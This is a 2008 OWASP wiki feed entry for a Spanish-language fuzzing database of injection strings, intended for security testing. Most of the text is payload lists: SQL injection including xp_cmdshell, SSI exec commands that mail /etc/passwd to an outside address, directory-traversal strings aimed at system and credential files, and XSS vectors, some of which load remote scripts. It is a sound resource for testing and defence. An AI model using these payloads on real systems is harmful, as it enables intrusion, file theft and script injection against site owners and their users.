<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/index.php?action=history&amp;feed=atom&amp;title=Category%3AOWASP_Fuzzing_Code_Database%2Fes</id>
		<title>Category:OWASP Fuzzing Code Database/es - Revision history</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/index.php?action=history&amp;feed=atom&amp;title=Category%3AOWASP_Fuzzing_Code_Database%2Fes"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database/es&amp;action=history"/>
		<updated>2026-05-24T03:07:34Z</updated>
		<subtitle>Revision history for this page on the wiki</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database/es&amp;diff=38324&amp;oldid=prev</id>
		<title>Jcmax: New page: Esta base de datos es una colección de varias declaraciones usadas en software de inyección de código. La mayoría de los profesionales de seguridad usan sus propios repositorios de dec...</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database/es&amp;diff=38324&amp;oldid=prev"/>
				<updated>2008-09-04T01:03:26Z</updated>
		
		<summary type="html">&lt;p&gt;New page: Esta base de datos es una colección de varias declaraciones usadas en software de inyección de código. La mayoría de los profesionales de seguridad usan sus propios repositorios de dec...&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;Esta base de datos es una colección de varias declaraciones usadas en software de inyección de código. La mayoría de los profesionales de seguridad usan sus propios repositorios de declaraciones recolectadas de varios proyectos por un largo tiempo. Queremos recolectar esas declaraciones – componerlas – mezclando bases de datos de varios proyectos como [[WebScarab]] y [[JBroFuzz]] ganando un gran conjunto de información de declaraciones efectivas para proveer mejores resultados al probar.&lt;br /&gt;
Por favor agregue sus propias declaraciones y revise las declaraciones ya agregadas. &lt;br /&gt;
&lt;br /&gt;
=== Declaraciones de inyecciones de SQL ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
a&amp;quot; or 1=1--&lt;br /&gt;
&amp;quot; or &amp;quot;a&amp;quot; = &amp;quot;a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SSI (Server Side Includes) Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;lt;mailto:Foobar@email.de&amp;gt; &amp;lt; cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Declaraciones de Directory Traversal ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.''&lt;br /&gt;
&lt;br /&gt;
=== Declaraciones de XSS – Declaraciones más efectivas / comunes ===&lt;br /&gt;
&lt;br /&gt;
Declaraciones de Prueba&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Codigo común de explotación (cubre varias vulnerabilidades de XSS)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Declaraciones XSS – Lista Completa ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=`javascript:alert(&amp;quot;RSnake says, 'XSS'&amp;quot;)`&amp;gt;&lt;br /&gt;
&amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav	ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x09;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0A;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0D;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
perl -e 'print &amp;quot;&amp;lt;IMG SRC=java\0script:alert(\&amp;quot;XSS\&amp;quot;)&amp;gt;&amp;quot;;' &amp;gt; out&lt;br /&gt;
perl -e 'print &amp;quot;&amp;lt;SCR\0IPT&amp;gt;alert(\&amp;quot;XSS\&amp;quot;)&amp;lt;/SCR\0IPT&amp;gt;&amp;quot;;' &amp;gt; out&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot; &amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT/XSS SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;BODY onload!#$%&amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;XSS&amp;quot;)&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT/SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;);//&amp;lt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;lt;B&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS')&amp;quot;&lt;br /&gt;
&amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;lt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;a=/XSS/\nalert(a.source)&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
\&amp;quot;;alert('XSS');//&lt;br /&gt;
&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;);&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;INPUT TYPE=&amp;quot;IMAGE&amp;quot; SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BODY BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BODY ONLOAD=alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG DYNSRC=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG LOWSRC=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BGSOUND SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BR SIZE=&amp;quot;&amp;amp;{alert('XSS')}&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;LAYER SRC=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/LAYER&amp;gt;&lt;br /&gt;
&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;@import'http://ha.ckers.org/xss.css';&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;Link&amp;quot; Content=&amp;quot;&amp;lt;http://ha.ckers.org/xss.css&amp;gt;; REL=stylesheet&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;BODY{-moz-binding:url(&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;)}&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;XSS STYLE=&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;li {list-style-image: url(&amp;quot;javascript:alert('XSS')&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS&lt;br /&gt;
&amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;XSS&amp;quot;)'&amp;gt;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IFRAME SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;&lt;br /&gt;
&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/FRAMESET&amp;gt;&lt;br /&gt;
&amp;lt;TABLE BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image: url(&amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;XSS&amp;quot;)';&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;IMG STYLE=&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;XSS STYLE=&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
exp/*&amp;lt;A STYLE='no\xss:noxss(&amp;quot;*//*&amp;quot;);xss:&amp;amp;#101;x&amp;amp;#x2F;*XSS*//*/*/pression(alert(&amp;quot;XSS&amp;quot;))'&amp;gt;&lt;br /&gt;
&amp;lt;STYLE TYPE=&amp;quot;text/javascript&amp;quot;&amp;gt;alert('XSS');&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;.XSS{background-image:url(&amp;quot;javascript:alert('XSS')&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;STYLE type=&amp;quot;text/css&amp;quot;&amp;gt;BODY{background:url(&amp;quot;javascript:alert('XSS')&amp;quot;)}&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;!--[if gte IE 4]&amp;gt;&amp;lt;SCRIPT&amp;gt;alert('XSS');&amp;lt;/SCRIPT&amp;gt;&amp;lt;![endif]--&amp;gt;&lt;br /&gt;
&amp;lt;BASE HREF=&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;OBJECT TYPE=&amp;quot;text/x-scriptlet&amp;quot; DATA=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/OBJECT&amp;gt;&lt;br /&gt;
&amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript:alert('XSS')&amp;gt;&amp;lt;/OBJECT&amp;gt;&lt;br /&gt;
&amp;lt;EMBED SRC=&amp;quot;http://ha.ckers.org/xss.swf&amp;quot; AllowScriptAccess=&amp;quot;always&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&lt;br /&gt;
&amp;lt;EMBED SRC=&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot; type=&amp;quot;image/svg+xml&amp;quot; AllowScriptAccess=&amp;quot;always&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&lt;br /&gt;
&amp;lt;HTML xmlns:xss&amp;gt;&amp;lt;?import namespace=&amp;quot;xss&amp;quot; implementation=&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;gt;&amp;lt;xss:xss&amp;gt;XSS&amp;lt;/xss:xss&amp;gt;&amp;lt;/HTML&amp;gt;&lt;br /&gt;
